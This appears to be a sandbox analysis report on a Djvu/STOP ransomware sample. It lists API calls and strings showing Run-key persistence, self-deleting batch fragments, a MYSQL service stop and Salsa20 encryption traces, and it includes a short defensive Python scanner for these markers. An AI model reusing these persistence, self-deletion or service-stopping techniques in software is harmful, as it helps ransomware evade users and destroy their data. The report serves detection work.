                                                                                      • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                      • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                      • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                      Uniqueness
                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _wcscmp.LIBCMT ref: 004382B9
                                                                                      • _wcscmp.LIBCMT ref: 004382CA
                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoLocale_wcscmp
                                                                                      • String ID: ACP$OCP
                                                                                      • API String ID: 1351282208-711371036
                                                                                      • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                      • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                      • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                      • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                      Uniqueness
                                                                                      Uniqueness Score: -1.00%

Strings
• input != nullptr && output != nullptr, xrefs: 0040C095
• e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
Memory Dump Source
• Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
• Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
Similarity
• API ID: __wassert
• String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
• API String ID: 3993402318-1975116136
• Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
• Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
• Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
• Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
Uniqueness Score: -1.00%

APIs
• CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
• GetLastError.KERNEL32 ref: 00412509
• CloseHandle.KERNEL32 ref: 0041251C
• CloseHandle.KERNEL32 ref: 00412539
• CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
• GetLastError.KERNEL32 ref: 0041255B
• CloseHandle.KERNEL32 ref: 0041256E
Memory Dump Source
• Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
• Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
Similarity
• API ID: CloseHandle$CreateErrorLastMutex
• String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
• API String ID: 2372642624-488272950
• Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
• Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
• Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
• Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
Uniqueness Score: -1.00%

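The CreateMutexA, GetLastError, CloseHandle sequence above is the sample's single-instance check (calling GetLastError directly after CreateMutexA is how ERROR_ALREADY_EXISTS is detected), and the two mutex names, the Salsa20.inl source path in the __wassert record and the delself.bat batch strings are fixed, build-specific markers. The scanner below is an added example, not part of this report or of the sample's code. It searches a raw memory dump or unpacked image for those markers in both ASCII and UTF-16LE, because the binary mixes ANSI and wide APIs (CreateMutexA takes the mutex name as ANSI, RegQueryValueExW reads the Run value name as UTF-16), and grades the result. The marker strings are copied from the String ID fields above; the dump it is run on is constructed test data.

```python
"""Triage scanner for the Djvu/STOP string markers listed in this report.

Added example (not Joe Sandbox or the sample's code). Scans a raw memory dump
or unpacked image for the markers in both ASCII and UTF-16LE and grades the hit.
"""
from __future__ import annotations

from dataclasses import dataclass

# Marker strings copied from the report's String ID fields.
MARKERS: dict[str, str] = {
    "mutex_1": "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}",
    "mutex_2": "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}",
    "salsa20_src": r"e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl",
    "selfdelete_bat": "delself.bat",
    "run_value": "SysHelper",
    "autostart_arg": " --AutoStart",
}

# Markers that identify this build specifically; the rest are generic.
BINARY_SPECIFIC = {"mutex_1", "mutex_2", "salsa20_src"}


@dataclass(frozen=True)
class Hit:
    tag: str
    encoding: str   # "ascii" or "utf-16le"
    offset: int


def _needles(text: str):
    # CreateMutexA takes the mutex name as ANSI, RegQueryValueExW reads the
    # Run value as UTF-16, so the same marker can appear in either encoding.
    yield "ascii", text.encode("ascii")
    yield "utf-16le", text.encode("utf-16-le")


def scan(blob: bytes) -> list[Hit]:
    """Return every marker occurrence in blob, ordered by offset."""
    hits: list[Hit] = []
    for tag, text in MARKERS.items():
        for enc, needle in _needles(text):
            pos = blob.find(needle)
            while pos >= 0:
                hits.append(Hit(tag, enc, pos))
                pos = blob.find(needle, pos + 1)
    hits.sort(key=lambda h: (h.offset, h.tag))
    return hits


def verdict(hits: list[Hit]) -> str:
    """Grade the hits: build-specific markers beat generic persistence strings."""
    tags = {h.tag for h in hits}
    if tags & BINARY_SPECIFIC:
        return "djvu-high"
    if tags:
        return "suspicious"   # only generic persistence/self-delete strings
    return "clean"


def constructed_dump() -> bytes:
    """Constructed test blob, not a real dump: one mutex name as ASCII and the
    Run value name as UTF-16LE, separated by zero padding."""
    return (b"\x00" * 64
            + MARKERS["mutex_1"].encode("ascii")
            + b"\x00" * 16
            + MARKERS["run_value"].encode("utf-16-le")
            + b"\x00" * 8)


if __name__ == "__main__":
    found = scan(constructed_dump())
    for h in found:
        print(f"{h.offset:#010x} {h.encoding:<8} {h.tag}")
    print(verdict(found))
```

To run it against a real dump, replace constructed_dump() with the bytes of the .sdmp file named in the record; the two-encoding search is what a YARA rule would get from the `ascii wide` modifiers.
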
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: _strncmp
• String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
• API String ID: 909875538-2733969777
• Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
• Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
• Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
• Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
• String ID:
• API String ID: 1503006713-0
• Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
• Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
• Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
• Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
Uniqueness Score: -1.00%

APIs
• PostQuitMessage.USER32(00000000), ref: 0041BB49
• DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
• _malloc.LIBCMT ref: 0041BBE4
• GetComputerNameW.KERNEL32 ref: 0041BBF4
• _free.LIBCMT ref: 0041BCD7
  • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
  • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
  • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
  • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
  • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
  • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
• IsWindow.USER32(?), ref: 0041BF69
• DestroyWindow.USER32(?), ref: 0041BF7B
• DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
• String ID:
• API String ID: 3873257347-0
• Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
• Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
• Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
• Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
• String ID:
• API String ID: 2762079118-0
• Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
• Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
• Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
• Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
Uniqueness Score: -1.00%

APIs
• CoInitialize.OLE32(00000000), ref: 00411BB0
• CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
• CoUninitialize.OLE32 ref: 00411BD0
• SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
• SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
• lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
• lstrcatW.KERNEL32(?), ref: 00411C44
• GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
• lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
• String ID: \shell32.dll
• API String ID: 679253221-3783449302
• Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
• Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
• Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
• Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
• GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
• GetDesktopWindow.USER32 ref: 004549FB
• GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
• GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
• GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
• GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
• _wcsstr.LIBCMT ref: 00454A8A
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
• String ID: Service-0x$_OPENSSL_isservice
• API String ID: 2112994598-1672312481
• Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
• Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
• Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
• Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
• GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
• __vfwprintf_p.LIBCMT ref: 00454B27
  • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
• vswprintf.LIBCMT ref: 00454B5D
• RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
• ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
• DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
• MessageBoxA.USER32 ref: 00454BD3
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Similarity
• API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
• String ID: OPENSSL$OpenSSL: FATAL
• API String ID: 277090408-1348657634
• Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
• Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
• Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
• Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                      • _memset.LIBCMT ref: 004123B6
                                                                                      • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                      • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                      • lstrcpyW.KERNEL32 ref: 0041240E
                                                                                      • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                      Strings
                                                                                      • SysHelper, xrefs: 004123D6
                                                                                      • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                      • API String ID: 122392481-4165002228
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
• Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
Yara matches
Similarity
• API ID: _memmove
• String ID: invalid string position$string too long
• API String ID: 4104443479-4289949731
Uniqueness
Uniqueness Score: -1.00%

APIs
• CoInitialize.OLE32(00000000), ref: 0040DAEB
• CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
• lstrcpyW.KERNEL32 ref: 0040DBD6
• PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
• _memset.LIBCMT ref: 0040DC38
• CoUninitialize.OLE32 ref: 0040DC92
Strings
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
• String ID: --Task$Comment$Time Trigger Task
• API String ID: 330603062-1376107329
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
• OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
• ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
• QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
• Sleep.KERNEL32(?), ref: 00411A75
• QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
• CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
• CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
Strings
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
• String ID: MYSQL
• API String ID: 2359367111-1651825290
Uniqueness
Uniqueness Score: -1.00%

APIs
• std::exception::exception.LIBCMT ref: 0044F27F
  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
• __CxxThrowException@8.LIBCMT ref: 0044F294
  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
• std::exception::exception.LIBCMT ref: 0044F2AD
• __CxxThrowException@8.LIBCMT ref: 0044F2C2
• std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
  • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
• __CxxThrowException@8.LIBCMT ref: 0044F2E2
• std::exception::exception.LIBCMT ref: 0044F2FB
• __CxxThrowException@8.LIBCMT ref: 0044F310
Strings
Memory Dump Source
• Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
• Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
Yara matches
Similarity
• API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
• String ID: bad function call
• API String ID: 2464034642-3612616537
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
• _fgetws.LIBCMT ref: 0040C7BC
• _memmove.LIBCMT ref: 0040C89F
• CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
Strings
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: CreateDirectory__wfsopen_fgetws_memmove
• String ID: C:\SystemID$C:\SystemID\PersonalID.txt
• API String ID: 2864494435-54166481
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
• GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
Strings
Memory Dump Source
• Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
• Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetFolderPathW$Shell32.dll$\
• API String ID: 2574300362-2555811374
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: _malloc$__except_handler4_fprintf
• String ID: &#160;$Error encrypting message: %s$\\n
• API String ID: 1783060780-3771355929
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
• Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
Yara matches
Similarity
• API ID: _strncmp
• String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
• API String ID: 909875538-2908105608
Uniqueness
Uniqueness Score: -1.00%

APIs
• __getptd_noexit.LIBCMT ref: 004C5D3D
  • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
  • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
  • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
  • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
  • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
• __calloc_crt.LIBCMT ref: 004C5D60
• __get_sys_err_msg.LIBCMT ref: 004C5D7E
• __invoke_watson.LIBCMT ref: 004C5D9B
• __get_sys_err_msg.LIBCMT ref: 004C5DCD
• __invoke_watson.LIBCMT ref: 004C5DEB
Strings
• Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
• String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
• API String ID: 2139067377-798102604
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
• RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
• RegCloseKey.ADVAPI32(00000000), ref: 0040C700
• RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
• RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
Strings
Memory Dump Source
• Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
• Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: CloseValue$OpenQuery
• String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
• API String ID: 3962714758-1667468722
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
• Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
Yara matches
Similarity
• API ID: __aulldvrm
• String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
• API String ID: 1302938615-3129329331
                                                                                      • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                      • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                      • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                      • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00440DE5
                                                                                      • __shift.LIBCMT ref: 00440E45
                                                                                      • _memmove.LIBCMT ref: 00440F00
                                                                                      • __invoke_watson.LIBCMT ref: 00440F22
                                                                                        • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                      • __fltout2.LIBCMT ref: 00440F55
                                                                                        • Part of subcall function 00448DCF: ___dtold.LIBCMT ref: 00448DF3
                                                                                        • Part of subcall function 00448DCF: _$I10_OUTPUT.LIBCMT ref: 00448E0E
                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Locale$FeatureI10_PresentProcessorUpdateUpdate::____dtold__fltout2__getptd_noexit__invoke_watson__shift_memmove
                                                                                      • String ID: e+000
                                                                                      • API String ID: 1950323913-1027065040
                                                                                      • Opcode ID: 4aab24fa332338ded8e28756c8d48da1e1a79256754183a9b5f45fe68276ae34
                                                                                      • Instruction ID: 61e1f76fd18929e88c824d171d6639451d133659e2a5b2c773bd3f109f816237
